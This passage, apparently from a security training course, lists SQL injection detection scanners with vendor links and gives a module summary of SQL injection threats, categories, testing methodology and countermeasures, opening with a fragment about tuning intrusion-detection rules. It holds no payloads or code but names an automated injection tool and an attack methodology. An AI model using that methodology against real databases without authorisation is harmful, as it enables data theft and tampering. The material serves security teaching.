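The in-line comment request keeps the paranoid meta-character hit but loses the more specific union match, the hex-literal request matches nothing, and O'Brien shows why the paranoid rule is tuned with uricontent before it is deployed broadly.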
SQL Injection Detection Tools
The following are some more SQL injection detection tools that can be used for detecting SQL injection vulnerabilities:
HP WebInspect available at http://www.hpenterprisesecurity.com
SQLDict available at http://ntsecurity.nu
HP Scrawlr available at https://h30406.www3.hp.com
SQL Block Monitor available at http://sql-tools.net
Acunetix Web Vulnerability Scanner available at http://www.acunetix.com
GreenSQL Database Security available at http://www.greensql.com
Microsoft Code Analysis Tool .NET (CAT.NET) available at http://www.microsoft.com
NGS SQuirreL Vulnerability Scanners available at http://www.nccgroup.com
WSSA - Web Site Security Scanning Service available at http://www.beyondsecurity.com
N-Stalker Web Application Security Scanner available at http://www.nstalker.com
Module Summary
SQL injection is the most common website vulnerability on the Internet that takes advantage of non-validated input vulnerabilities to pass SQL commands through a web application for execution by a backend database.
Threats of SQL injection include authentication bypass, information disclosure, and data integrity and availability compromise.
Database admins and web application developers need to follow a methodological approach to detect SQL injection vulnerabilities in web infrastructure that includes manual testing, function testing, and fuzzing.
SQL injection is broadly categorized as simple and blind; simple SQL injection is further categorized as UNION and error-based SQL injection.
Pen testers and attackers need to follow a comprehensive SQL injection methodology and use automated tools such as BSQLHacker for successful injection attacks.
Major SQL injection countermeasures involve input data validation, error message suppression or customization, proper DB access privilege management, and isolation of databases from the underlying OS.